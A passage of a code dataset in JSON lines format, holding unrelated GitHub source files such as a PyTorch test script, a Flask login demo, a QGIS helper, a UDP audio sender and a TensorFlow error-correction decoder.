{val_loss/len(test_loader)}, Acc: {val_acc/len(test_loader)}')\n return val_loss/len(test_loader)\n\nif __name__ == '__main__':\n \n # Set random seed for reproducibility\n init_seeds(4673)\n \n data_root_path = \"/home/akash/spring23_coursework/cap5516/a1/chest_xray\"\n \n # Load datasets\n test_dataset = ImageFolder(osp.join(data_root_path, 'test'), transform=transform_data(mode='test'))\n \n # HYPERPARAMS\n BATCH_SIZE = 48\n \n # Dataloader\n test_loader = DataLoader(test_dataset, batch_size=BATCH_SIZE, shuffle=False, num_workers=8, pin_memory=True)\n \n # Define model\n model = torchvision.models.resnet50(pretrained=False).to(device)\n \n # # modify fc layer\n model.fc = nn.Linear(2048, 2).to(device) # number of classes -2 \n model.load_state_dict(torch.load('train_log_wts/scratch/03-21-00-05/best_model_val_loss_7.pth'), strict=True)\n # define criterion\n criterion = nn.CrossEntropyLoss()\n \n test_loss = test(model, test_loader, criterion)\n \n \n \n \n \n ","repo_name":"AKASH2907/cap5516_project_assignments","sub_path":"a1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72658181812","text":"#!/usr/bin/python3\n\"\"\" Script that uses JSONPlaceholder API to get information about employee \"\"\"\nimport requests\nimport sys\n\n\nif __name__ == \"__main__\":\n url = 'https://jsonplaceholder.typicode.com/'\n\n user = '{}users/{}'.format(url, sys.argv[1])\n response1 = requests.get(user)\n json_file = response1.json()\n print(\"Employee {} is done with tasks\".format(\n json_file.get('name')), end=\"\")\n\n todos = '{}todos?userId={}'.format(url, sys.argv[1])\n response2 = requests.get(todos)\n tasks = response2.json()\n completed_task = []\n for task in tasks:\n if task.get('completed') is True:\n completed_task.append(task)\n\n print(\"({}/{}):\".format(len(completed_task), len(tasks)))\n for task in completed_task:\n print(\"\\t {}\".format(task.get(\"title\")))\n","repo_name":"5237-mests/alx-system_engineering-devops","sub_path":"0x15-api/0-gather_data_from_an_API.py","file_name":"0-gather_data_from_an_API.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33249818113","text":"from graia.saya import Channel\nfrom graia.ariadne.app import Ariadne\nfrom graia.ariadne.model import Group, Member\nfrom graia.ariadne.message.chain import MessageChain\nfrom graia.ariadne.message.element import Voice\nfrom graia.ariadne.event.message import GroupMessage\nfrom graia.broadcast.exceptions import ExecutionStop\nfrom graia.saya.builtins.broadcast.schema import ListenerSchema\nfrom graia.ariadne.message.parser.twilight import (\n Twilight,\n RegexResult,\n WildcardMatch,\n)\n\nfrom libs.control import Permission\nfrom libs.dict_loader import DictData\n\n\nchannel = Channel.current()\n\n@channel.use(\n ListenerSchema(\n listening_events=[GroupMessage],\n inline_dispatchers=[Twilight([\"anything\" @ WildcardMatch()])]\n )\n)\nasync def main(app: Ariadne, member: Member, group: Group, anything: RegexResult):\n \n try:\n Permission.group_permission_check(group, \"sample_player\")\n except Exception as e:\n raise ExecutionStop()\n \n try: \n Permission.user_permission_check(member, Permission.DEFAULT)\n except Exception as e :\n raise ExecutionStop()\n \n if anything.matched:\n msg = anything.result.display\n if msg in DictData.GenshinSample.dictionary.keys():\n 
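# assumption: every dictionary value names an existing .silk sample under data/play/samples/, relative to the bot's working directory\n 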
my_path = \"data/play/samples/\" + DictData.GenshinSample.dictionary[msg] + \".silk\"\n await app.send_group_message(\n group,\n MessageChain([Voice(path = my_path)])\n )\n ","repo_name":"mikezom/bigbedbot-py","sub_path":"libs/function/event/sample_player.py","file_name":"sample_player.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"3166615","text":"from playwright.sync_api import sync_playwright\n\ndef automate(meetup_group_url):\n # open the website\n with sync_playwright() as p:\n browser = p.chromium.launch(headless=False)\n page = browser.new_page()\n page.goto(\"https://www.google.com\")\n\n # search for \"playwright\"\n page.fill(\"input[aria-label='Search']\", \"playwright\")\n page.click(\"text=Google Search\")\n\n # click on the first result\n page.click(\"text=Playwright: Python library to automate Chromium, Firefox and WebKit\")\n\n # close the browser\n browser.close()","repo_name":"wasdee/ThaiPy2TechCal","sub_path":"thaipy2techcal/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4296624501","text":"#Add Attribute\nclass Student:\n def __init__(self, name , age, id, grades):\n self.name = name\n self.age = age\n self.id = id\n self.grades = grades\n\n def talk(self):\n print(\"My name is :\", self.name)\n\n\nstudent1 = Student('Nouf', 21, 'xx00', [95,85,92])\nstudent2 = Student('Hessan', 19, 'xx01', 95)\n#Add attribute to object\nstudent2.v_hours = 16\n\nprint(dir(student1))\nprint(dir(student2)) # we see the v_hours is added to student2 object \n","repo_name":"kholoodi/Python","sub_path":"Python courses/Python103/Attributes&Methods 2/AddAttributes2-3.py","file_name":"AddAttributes2-3.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17708364541","text":"import triangle\nimport triangle.plot\nimport matplotlib.pyplot as plt\n\npts = triangle.get_data('dots')['vertices']\n\nax1 = plt.subplot(121, aspect='equal')\ntriangle.plot.plot(ax1, vertices=pts)\nlim = ax1.axis()\n\npoints, edges, ray_origin, ray_direct = triangle.voronoi(pts)\nd = dict(vertices=points, edges=edges, ray_origins=ray_origin, ray_directions=ray_direct)\nax2 = plt.subplot(122, sharex=ax1, sharey=ax1)\ntriangle.plot.plot(ax2, **d)\nax2.axis(lim)\n\nplt.show()\n","repo_name":"Geodels/tribad","sub_path":"doc/plot/voronoi.py","file_name":"voronoi.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73796559414","text":"# 装备属性部分\n# import json\n# import os\n\nfrom PublicReference.utils.constant import *\nfrom .装备_套装 import *\nfrom .装备_特殊 import *\nfrom .装备_首饰 import *\nfrom .装备_防具 import *\nfrom .装备_武器 import *\nfrom .基础函数 import *\nfrom .融合_希洛克 import 希洛克\nfrom .融合_奥兹玛 import 奥兹玛\n\n装备版本 = \"GF\"\n\n# with open(\"ResourceFiles/Config/release_version.json\") as fp:\n# versionInfo = json.load(fp)\n# 装备版本 = versionInfo['EquipmentVersion']\n# fp.close()\n\n# if 装备版本.upper() == \"GF\":\n\n# else:\n# from .装备_武器_HF import *\n# from .装备_防具_HF import *\n# from .装备_首饰_HF import *\n# from .装备_特殊_HF import *\n# from .装备_套装_HF import *\n\n\nclass equipment():\n def __init__(self):\n self.load_equ()\n self.load_suit()\n\n def load_equ(self):\n self.equ_list = {}\n self.equ_id = {}\n 
self.equ_tuple = ()\n self.equ_id_tuple = ()\n self.index = {}\n for i in range(535): # 534 equipment items\n temp = eval('装备{}()'.format(i))\n self.equ_list[i] = temp\n self.equ_id[temp.名称] = i\n self.equ_tuple += (temp, )\n self.equ_id_tuple += (i, )\n key = '{}\\t{}\\t{}'.format(temp.所属套装, temp.品质, temp.部位)\n self.index[key] = i\n\n def load_suit(self):\n self.suit_list = {}\n self.suit_id = {}\n self.suit_name = ()\n self.suit_tuple = ()\n for i in range(127): # 126 set effects\n temp = eval('套装效果{}()'.format(i))\n self.suit_list[i] = temp\n self.suit_tuple += (temp, )\n key = '{}[{}]'.format(temp.名称, temp.件数)\n self.suit_id[key] = i\n self.suit_name += (key, )\n\n def load_img(self):\n self.equ_img = {}\n # base equipment icons 0~999\n for i in self.get_equ_id_list():\n path = './ResourceFiles/img/装备/{}.gif'.format(i)\n img = QMovie(path)\n img.start()\n self.equ_img[i] = img\n # Ozma icons 1000~1024\n for i in range(25):\n path = './ResourceFiles/img/奥兹玛/{}.gif'.format(i)\n img = QMovie(path)\n img.start()\n self.equ_img[1000 + i] = img\n # Sirocco icons 1100~1114\n for i in range(15):\n path = './ResourceFiles/img/希洛克/{}.gif'.format(i)\n img = QMovie(path)\n img.start()\n self.equ_img[1100 + i] = img\n # Sirocco weapon icons 2000~2999\n path = './ResourceFiles/img/希洛克/武器/'\n for i in os.listdir(path):\n img = QMovie(os.path.join(path, i))\n img.start()\n self.equ_img[2000 + int(i.split('.')[0])] = img\n\n def get_suits_by_equips(self, equips):\n suits = []\n dictionary = {}\n for i in equips:\n item = self.get_equ_by_name(i)\n if item.所属套装2 != '无':\n j = item.所属套装2\n k = item.所属套装\n if k != '智慧产物':\n dictionary[k] = dictionary.get(k, 0) + 1\n else:\n j = item.所属套装\n if j != '无':\n dictionary[j] = dictionary.get(j, 0) + 1\n\n for i in dictionary.keys():\n if dictionary[i] >= 2:\n temp = '{}[{}]'.format(i, 2)\n if temp in self.suit_name:\n suits.append(temp)\n if dictionary[i] >= 3:\n temp = '{}[{}]'.format(i, 3)\n if temp in self.suit_name:\n suits.append(temp)\n if dictionary[i] >= 5:\n temp = '{}[{}]'.format(i, 5)\n if temp in self.suit_name:\n suits.append(temp)\n for i in suits:\n try:\n temp = i.replace(i.split('[')[0], self.get_suit_by_name(i).子套装)\n if temp in suits:\n suits.remove(temp)\n except:\n pass\n return suits\n\n def get_suit_by_id(self, id):\n return self.suit_list.get(id, 套装())\n\n def get_suit_by_name(self, name):\n return self.get_suit_by_id(self.suit_id.get(name, 0))\n\n def get_equ_by_id(self, id):\n return self.equ_list.get(id, 装备())\n\n def get_img_by_id(self, id):\n return self.equ_img.get(id, QMovie(''))\n\n def get_equ_by_name(self, name):\n return self.get_equ_by_id(self.equ_id.get(name, 0))\n\n def get_img_by_name(self, name, num=0):\n id = self.equ_id.get(name, 0)\n # if id+num in self.equ_id_tuple:\n id += num\n return self.get_img_by_id(id)\n\n def get_id_by_name(self, name):\n return self.equ_id.get(name, 0)\n\n def get_equ_list(self):\n return self.equ_tuple\n\n def get_suit_list(self):\n return self.suit_tuple\n\n def get_equ_id_list(self):\n return self.equ_id_tuple\n\n def get_suit_name(self):\n return self.suit_name\n\n def get_id_by_index(self, suit, quality, part):\n key = '{}\\t{}\\t{}'.format(suit, quality, part)\n return self.index.get(key, 0)\n\n def get_equ_by_index(self, suit, quality, part):\n id = self.get_id_by_index(suit, quality, part)\n return self.get_equ_by_id(id)\n\n\nequ = 
equipment()\n","repo_name":"dnfcalc/DNFCalculating","sub_path":"PublicReference/equipment/equ_list.py","file_name":"equ_list.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"21"} +{"seq_id":"30617330139","text":"__author__ = 'Luiz Motta'\n__date__ = '2019-01-31'\n__copyright__ = '(C) 2019, Luiz Motta'\n__revision__ = '$Format:%H$'\n\nfrom qgis import utils as QgsUtils\nfrom qgis.core import QgsProject, QgsCoordinateTransform\n\nclass MapCanvasFeature():\n def __init__(self):\n self.project = QgsProject.instance()\n self.canvas = QgsUtils.iface.mapCanvas()\n \n def flash(self, layer, feature):\n self.canvas.flashGeometries( [ feature.geometry() ], layer.crs() )\n\n def zoom(self, layer, feature):\n def getBoudingBoxGeomCanvas():\n geom = feature.geometry()\n crsLayer = layer.crs()\n crsCanvas = self.project.crs()\n if not crsLayer == crsCanvas:\n ct = QgsCoordinateTransform( layer.crs(), self.project.crs(), self.project )\n bbox = ct.transform( geom.boundingBox() )\n else:\n bbox = geom.boundingBox()\n return bbox\n\n if not feature.hasGeometry():\n return\n self.canvas.setExtent( getBoudingBoxGeomCanvas() )\n self.canvas.zoomByFactor( 1.05 )\n self.canvas.refresh()\n self.flash( layer, feature )\n","repo_name":"lmotta/ibamaprocessing","sub_path":"algorithms/mapcanvasfeature.py","file_name":"mapcanvasfeature.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"32500270963","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 24 10:43:40 2021\n\n@author: Eric.Gomez-V@unilever.com\n\"\"\"\nfrom pandas import ExcelWriter\nfrom progress.bar import ShadyBar\n\n\ndef dict_to_excel(dict_sheetNames_dfs:dict, fileName:str):\n \"\"\"\n Writes the given DataFrames to an Excel file, one sheet per entry.\n \"\"\"\n print('Writing file: ',fileName)\n sheetNameList = list(dict_sheetNames_dfs.keys())\n dataFrameList = list(dict_sheetNames_dfs.values())\n def column_string(n:int):\n \"\"\"\n Returns the Excel column label for column number n.\n \"\"\"\n string = \"\"\n while n > 0:\n n, remainder = divmod(n - 1, 26)\n string = chr(65 + remainder) + string\n return string\n\n writer = ExcelWriter(# pylint: disable=abstract-class-instantiated\n path=fileName, engine='xlsxwriter') \n workbook = writer.book # pylint: disable=no-member\n header_format = workbook.add_format({'bold': True, 'align': 'center',\n 'fg_color': '#80bfff', 'border': 2,\n 'font_name': 'Times New Roman', 'font_size': 9})\n body_format = workbook.add_format(\n {'border': 1, 'align': 'left', 'font_name': 'Times New Roman', 'font_size': 9})\n bar = ShadyBar(\"Loading...\", max=len(dataFrameList), suffix='%(percent)d%%')\n indexSheet = 0\n for dataFrame in dataFrameList:\n letraInicial = \"A\"\n letraFinal = column_string(len(dataFrame.columns))\n letrasColXlsx = [column_string(i)\n for i in range(1, len(dataFrame.columns)+1)]\n lenColNames = [len(col) for col in dataFrame.columns]\n lenFirstColReg = [len(max(list(map(lambda x: str(x),dataFrame[col].tolist())), key=len))\n for col in dataFrame.columns]\n dataFrame.to_excel(\n writer, sheet_name=sheetNameList[indexSheet], index=False)\n worksheet = writer.sheets[sheetNameList[indexSheet]]\n if len(letrasColXlsx) == len(lenColNames):\n for i in range(len(letrasColXlsx)):\n 
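# use the wider of the header text and the longest cell value as the column width\n 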
if lenColNames[i] > lenFirstColReg[i]:\n worksheet.set_column(\n letrasColXlsx[i]+':'+letrasColXlsx[i], lenColNames[i], body_format)\n else:\n worksheet.set_column(\n letrasColXlsx[i]+':'+letrasColXlsx[i], lenFirstColReg[i], body_format)\n for col_num, value in enumerate(dataFrame.columns.values):\n worksheet.write(0, col_num, value, header_format)\n worksheet.autofilter(letraInicial+'1:'+letraFinal+'1')\n if \"complete\" in sheetNameList[indexSheet]:\n worksheet.hide()\n indexSheet += 1\n bar.next()\n print(\"\\n\")\n writer.save()\n","repo_name":"refleon-cbot/ChatBot_LOG_summary","sub_path":"modules/file_writer_util.py","file_name":"file_writer_util.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71002093494","text":"# -*- coding: utf-8 -*-\r\n\"\"\"@package business.resource.integral_resource\r\nPoints (integral) resource\r\n\r\nAttributes of the points resource:\r\n\r\nAttribute\t| Type\t| Description\r\n:------ | :------- | :-------\r\nintegral | number\t| the number of points\r\nmoney | number \t| the price the points correspond to\r\nintegral_log_id\t| number\t| points log ID (to be confirmed)\r\n\"\"\"\r\n\r\nimport logging\r\nimport decimal\r\nimport math\r\n#import json\r\n#from bs4 import BeautifulSoup\r\n#import math\r\n#import itertools\r\n#from datetime import datetime\r\n\r\nfrom eaglet.decorator import param_required\r\n##from wapi import wapi_utils\r\n#from eaglet.core.cache import utils as cache_util\r\nfrom db.mall import models as mall_models\r\n#import resource\r\nfrom eaglet.core import watchdog\r\nfrom business import model as business_model\r\n#from business.mall.product import Product\r\n#import settings\r\nfrom business.decorator import cached_context_property\r\n#from business.account.integral import Integral\r\n\r\nclass IntegralResource(business_model.Resource):\r\n\t\"\"\"Points (integral) resource\r\n\t\"\"\"\r\n\t__slots__ = (\r\n\t\t'type',\r\n\t\t'integral',\r\n\t\t'money',\r\n\t\t'integral_log_id'\r\n\t\t)\r\n\r\n\r\n\t@staticmethod\r\n\t@param_required(['webapp_owner', 'webapp_user', 'type'])\r\n\tdef get(args):\r\n\t\t\"\"\"Factory method that creates an IntegralResource object\r\n\r\n\t\t@return an IntegralResource object\r\n\t\t\"\"\"\r\n\t\tintegral_resource = IntegralResource(args['webapp_owner'], args['webapp_user'], args['type'])\r\n\r\n\t\treturn integral_resource\r\n\r\n\tdef __init__(self, webapp_owner, webapp_user, type):\r\n\t\tbusiness_model.Resource.__init__(self)\r\n\t\tself.type = type\r\n\t\tself.context['webapp_user'] = webapp_user\r\n\t\tself.context['webapp_owner'] = webapp_owner\r\n\t\tself.context['money'] = None\r\n\r\n\tdef get_type(self):\r\n\t\treturn self.type\r\n\r\n\tdef get_resource(self, integral):\r\n\t\tself.integral = integral\r\n\t\t#self.money = integral_money\r\n\t\twebapp_user = self.context['webapp_user']\r\n\t\tself.integral_log_id = -1\r\n\t\tif integral > 0 and not webapp_user.can_use_integral(integral):\r\n\t\t\treturn False, u'积分不足'\r\n\t\telif integral == 0:\r\n\t\t\treturn True, u'00'\r\n\t\telse:\r\n\t\t\tsuccessed, integral_log_id = webapp_user.use_integral(integral)\r\n\t\t\tself.integral_log_id = integral_log_id\r\n\t\t\tif successed:\r\n\t\t\t\treturn True, ''\r\n\t\t\telse:\r\n\t\t\t\treturn False, u'扣除积分失败'\r\n\r\n\t@property\r\n\tdef money(self):\r\n\t\tif self.context['money']:\r\n\t\t\treturn self.context['money']\r\n\t\telse:\r\n\t\t\twebapp_owner = self.context['webapp_owner']\r\n\t\t\tcount_per_yuan = webapp_owner.integral_strategy_settings.integral_each_yuan\r\n\r\n\t\t\tif count_per_yuan == 0:\r\n\t\t\t\tlogging.error(\"ERROR: count_per_yuan SHOULD NOT be ZERO!\")\r\n\t\t\t\tintegral_money = float(self.integral)\r\n\t\t\telse:\r\n\t\t\t\tintegral_money = 
float(float(self.integral)/count_per_yuan)\r\n\r\n\t\t\tintegral_money = round(math.floor(integral_money*100)/100, 2) \r\n\t\t\t#integral_money = decimal.Decimal(integral_money).quantize(decimal.Decimal('.01'), rounding=decimal.ROUND_05UP)\r\n\t\t\treturn integral_money\r\n\r\n\t@money.setter\r\n\tdef money(self, money):\r\n\t\tself.context['money'] = money\r\n","repo_name":"chengdg/apiserver","sub_path":"business/resource/integral_resource.py","file_name":"integral_resource.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43062706772","text":"'''\r\n/* Copyright (C) Saltworks Security, LLC - All Rights Reserved\r\n* Unauthorized copying of this file, via any medium is strictly prohibited\r\n* Proprietary and confidential\r\n* Written by Saltworks Security, LLC (www.saltworks.io) , 2019\r\n*/\r\n'''\r\nimport json\r\nimport sys\r\nimport requests\r\n\r\n\r\nclass fodIssCounts:\r\n\tdef __init__(self):\r\n\t\tself.fodIsss = {}\r\n\r\n\tdef addIss(self,InFODIss):\r\n\r\n\t\t'''\r\n\t\tprint('{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}'.format(iCount, sscVul['_source']['projectVersionId'],\r\n vul['_source']['issueName'],\r\n vul['_source']['hidden'], \r\n vul['_source']['suppressed'], \r\n vul['_source']['removedDate'], \r\n vul['_source']['scanStatus']))\r\n\t\t'''\r\n\t\ttry:\r\n\t\t\tif InFODIss['_source']['isSuppressed']:\r\n\t\t\t\tholdstatus = 'Suppressed'\r\n\t\t\r\n\t\texcept KeyError:\r\n\r\n\t\t\tprint(InFODIss)\r\n\r\n\t\tif ((InFODIss['_source']['severityString'] == 'Critical') or (InFODIss['_source']['severityString'] == 'High') or (InFODIss['_source']['severityString'] == 'Medium') or (InFODIss['_source']['severityString'] == 'Low')):\r\n\t\t\tincludeRec = True\r\n\t\telse:\r\n\t\t\tincludeRec = False\r\n\r\n\t\tmatchfound = False\r\n\t\t\t\r\n\t\tif (InFODIss['_source']['isSuppressed'] and includeRec == True):\r\n\t\t\tholdstatus = 'Suppressed'\r\n\t\t\tmatchfound = True\r\n\t\t\tissKey = '{}{}{}{}{}{}'.format(InFODIss['_source']['releaseId'], InFODIss['_source']['category'], holdstatus, InFODIss['_source']['severityString'], InFODIss['_source']['introducedDate'], InFODIss['_source']['scantype']) \r\n\r\n\t\t\tif issKey in self.fodIsss:\r\n\t\t\t\t#Increment existing counts\r\n\t\t\t\tiss = self.fodIsss[issKey]\r\n\t\t\t\t#print('update')\r\n\t\t\telse:\r\n\t\t\t\t#vul = sscVulCount(InSSCVul['_source']['projectVersionId'])\r\n\t\t\t\t\r\n\t\t\t\tiss = {\r\n\t\t\t\t\t'releaseId': InFODIss['_source']['releaseId'],\r\n\t\t\t\t\t'category': InFODIss['_source']['category'],\r\n\t\t\t\t\t'status': holdstatus,\r\n\t\t\t\t\t'severityString': InFODIss['_source']['severityString'],\r\n\t\t\t\t\t'introducedDate': InFODIss['_source']['introducedDate'],\r\n\t\t\t\t\t'removedDate': '',\r\n\t\t\t\t\t'scantype': InFODIss['_source']['scantype'],\r\n\t\t\t\t\t'reccount': 0\r\n\t\t\t\t}\r\n\r\n\t\t\tiss['reccount'] = iss['reccount'] + 1\r\n\t\t\t\r\n\t\t\tself.fodIsss[issKey] = iss\r\n\r\n\r\n\t\tif (InFODIss['_source']['status'] == 'Fix Validated' and includeRec == True):\r\n\t\t\tholdstatus = 'Fixed'\r\n\t\t\tmatchfound = True\r\n\t\t\tissKey = '{}{}{}{}{}{}'.format(InFODIss['_source']['releaseId'], InFODIss['_source']['category'], holdstatus, InFODIss['_source']['severityString'], InFODIss['_source']['introducedDate'], InFODIss['_source']['scantype']) \r\n\r\n\t\t\tif issKey in self.fodIsss:\r\n\t\t\t\t#Increment existing counts\r\n\t\t\t\tiss = 
self.fodIsss[issKey]\r\n\t\t\t\t#print('update')\r\n\t\t\telse:\r\n\t\t\t\t#vul = sscVulCount(InSSCVul['_source']['projectVersionId'])\r\n\t\t\t\t\r\n\t\t\t\tiss = {\r\n\t\t\t\t\t'releaseId': InFODIss['_source']['releaseId'],\r\n\t\t\t\t\t'category': InFODIss['_source']['category'],\r\n\t\t\t\t\t'status': holdstatus,\r\n\t\t\t\t\t'severityString': InFODIss['_source']['severityString'],\r\n\t\t\t\t\t'introducedDate': InFODIss['_source']['introducedDate'],\r\n\t\t\t\t\t'removedDate': '',\r\n\t\t\t\t\t'scantype': InFODIss['_source']['scantype'],\r\n\t\t\t\t\t'reccount': 0\r\n\t\t\t\t}\r\n\r\n\t\t\tiss['reccount'] = iss['reccount'] + 1\r\n\t\t\t\r\n\t\t\tself.fodIsss[issKey] = iss\r\n\r\n\r\n\t\tif (matchfound == False and includeRec == True):\r\n\t\t\tholdstatus = 'Open'\r\n\r\n\t\t\tissKey = '{}{}{}{}{}{}'.format(InFODIss['_source']['releaseId'], InFODIss['_source']['category'], holdstatus, InFODIss['_source']['severityString'], InFODIss['_source']['introducedDate'], InFODIss['_source']['scantype']) \r\n\r\n\t\t\tif issKey in self.fodIsss:\r\n\t\t\t\t#Increment existing counts\r\n\t\t\t\tiss = self.fodIsss[issKey]\r\n\t\t\t\t#print('update')\r\n\t\t\telse:\r\n\t\t\t\t#vul = sscVulCount(InSSCVul['_source']['projectVersionId'])\r\n\t\t\t\t\r\n\t\t\t\tiss = {\r\n\t\t\t\t\t'releaseId': InFODIss['_source']['releaseId'],\r\n\t\t\t\t\t'category': InFODIss['_source']['category'],\r\n\t\t\t\t\t'status': holdstatus,\r\n\t\t\t\t\t'severityString': InFODIss['_source']['severityString'],\r\n\t\t\t\t\t'introducedDate': InFODIss['_source']['introducedDate'],\r\n\t\t\t\t\t'removedDate': '',\r\n\t\t\t\t\t'scantype': InFODIss['_source']['scantype'],\r\n\t\t\t\t\t'reccount': 0\r\n\t\t\t\t}\r\n\r\n\t\t\tiss['reccount'] = iss['reccount'] + 1\r\n\t\t\t\r\n\t\t\tself.fodIsss[issKey] = iss\r\n\t\t \r\n\r\n\t\t\t\t\r\n\r\n\tdef searchFODReleasesforReleaseId(self, releaseid):\r\n\r\n\t\turl = 'http://localhost:9200/fodreleases/_search'\r\n\r\n\t\t_Headers = {'Accept': 'application/json',\r\n \t\t 'Content-Type': 'application/json'}\r\n\r\n\t\t_post ={\r\n\t\t\t\"query\": {\r\n\t\t\t\t\"match_phrase\": {\r\n\t\t\t\t\t\"releaseId\": releaseid\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\r\n\t\tresponse = requests.post(url, data=json.dumps(_post), headers=_Headers)\r\n\r\n\t\t#print(response.text)\r\n\r\n\t\treturn json.loads(response.text)\r\n\t\t\t\r\n\t","repo_name":"gatsalt/FDRewrite","sub_path":"ABCfodIssCount.py","file_name":"ABCfodIssCount.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15795656185","text":"import socket\nimport pyaudio\n\n# Constants\nSENDER_IP = 'YOUR_SENDER_IP' # Replace with the sender's IP address\nRECEIVER_IP = 'YOUR_RECEIVER_IP' # Replace with the receiver's IP address\nPORT = 12345\n\n# Initialize PyAudio\np = pyaudio.PyAudio()\nCHUNK = 1024\nFORMAT = pyaudio.paInt16\nCHANNELS = 1\nRATE = 44100\n\n# Create a socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# Start audio stream\nstream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK)\n\nwhile True:\n audio_data = stream.read(CHUNK)\n sock.sendto(audio_data, (RECEIVER_IP, PORT))\n\n# 
Cleanup\nstream.stop_stream()\nstream.close()\np.terminate()\nsock.close()\n","repo_name":"JAPJEET01/rtsp_sounddevice","sub_path":"sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22140884674","text":"from flask import Flask, render_template, request, redirect, url_for, flash\n\napp = Flask(__name__)\napp.secret_key = 'sua_chave_secreta'\n\n# Lista de usuários cadastrados (apenas para fins de exemplo)\nusuarios_cadastrados = []\n\n@app.route('/')\ndef index():\n return render_template('login.html')\n\n@app.route('/login', methods=['POST'])\ndef login():\n email = request.form['email']\n senha = request.form['senha']\n\n # Lógica de validação da senha aqui (1 letra maiúscula, 1 número, 1 caractere especial, pelo menos 6 caracteres)\n if not (len(senha) >= 6 and any(c.isupper() for c in senha) and any(c.isdigit() for c in senha) and any(not c.isalnum() for c in senha)):\n flash('A senha deve conter pelo menos 6 caracteres, 1 letra maiúscula, 1 número e 1 caractere especial.')\n return redirect(url_for('index'))\n\n # Verifique se o usuário existe (aqui você pode usar uma lógica de banco de dados)\n if (email, senha) in usuarios_cadastrados:\n flash('Login bem-sucedido!')\n return redirect(url_for('index'))\n else:\n flash('Credenciais inválidas. Tente novamente.')\n return redirect(url_for('index'))\n\n@app.route('/cadastro')\ndef cadastro():\n return render_template('cadastro.html')\n\n@app.route('/cadastro', methods=['POST'])\ndef cadastrar_usuario():\n nome = request.form['nome']\n cpf = request.form['cpf']\n email = request.form['email']\n telefone = request.form['telefone']\n endereco = request.form['endereco']\n senha = request.form['senha']\n confirmar_senha = request.form['confirmar_senha']\n\n # Verifique se a senha e a confirmação da senha são iguais\n if senha != confirmar_senha:\n flash('A senha e a confirmação de senha não coincidem.')\n return redirect(url_for('cadastro'))\n\n # Salvar os dados do usuário (aqui você pode adicionar lógica de banco de dados)\n usuarios_cadastrados.append((email, senha))\n flash('Cadastro realizado com sucesso!')\n return redirect(url_for('index'))\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"ArthurPedro145/Web_III","sub_path":"meu_ambiente_virtual/my_project/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71577423092","text":"import tensorflow as tf\nimport numpy as np\nimport time\nfrom datetime import timedelta\n\ndistance = 7\nnum_anc = 24\n\nclass Samples:\n def __init__(self, inputs, targets):\n self.test_size = 1000\n self.syndromes = inputs\n self.logicals = targets\n self.num_data = len(self.syndromes) \n\n def __iter__(self):\n return self\n\n def test_samples(self):\n syndromes_batch = self.syndromes[-self.test_size:self.num_data]\n logicals_batch = self.logicals[-self.test_size:self.num_data]\n return syndromes_batch, logicals_batch\n\n def train_samples(self):\n batch_end = self.num_data - self.test_size\n syndromes_batch = self.syndromes[:batch_end]\n logicals_batch = self.logicals[:batch_end]\n return syndromes_batch, logicals_batch\n\ndef load_data(file, num_samples):\n a = []\n b = []\n with open(file, 'r') as f:\n m = 0\n for line in f: # iterate over each line\n m += 1\n data = line.split() # split it by whitespace\n for i in 
range(num_anc+2):\n data[i] = int(data[i])\n a.append(data[:num_anc])\n b.append([data[-2]])\n if m == num_samples:#train + test\n break\n f.close()\n a = np.array(a)\n b = np.array(b)\n\n return Samples(a, b)\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\ndef bias_variable(length):\n initial = tf.constant(0.05, shape=[length])\n return tf.Variable(initial)\n\nnum_channels = 1\nnum_classes = 1\n\n# Convolutional Layer 1.\nfilter_size1 = 4 # Convolution filters are 5 x 5 pixels.\nnum_filters1 = 10 # There are 16 of these filters.\n\n# Convolutional Layer 2.\nfilter_size2 = 4 # Convolution filters are 5 x 5 pixels.\nnum_filters2 = 20 # There are 36 of these filters.\n\n# Fully-connected layer.\nfc_size = 128 # Number of neurons in fully-connected layer.\n\t\ndef new_conv_layer(input, # The previous layer.\n num_input_channels, # Num. channels in prev. layer.\n filter_size, # Width and height of each filter.\n num_filters, # Number of filters.\n use_pooling=True): # Use 2x2 max-pooling.\n\n shape = [filter_size, num_input_channels, num_filters]\n weights = 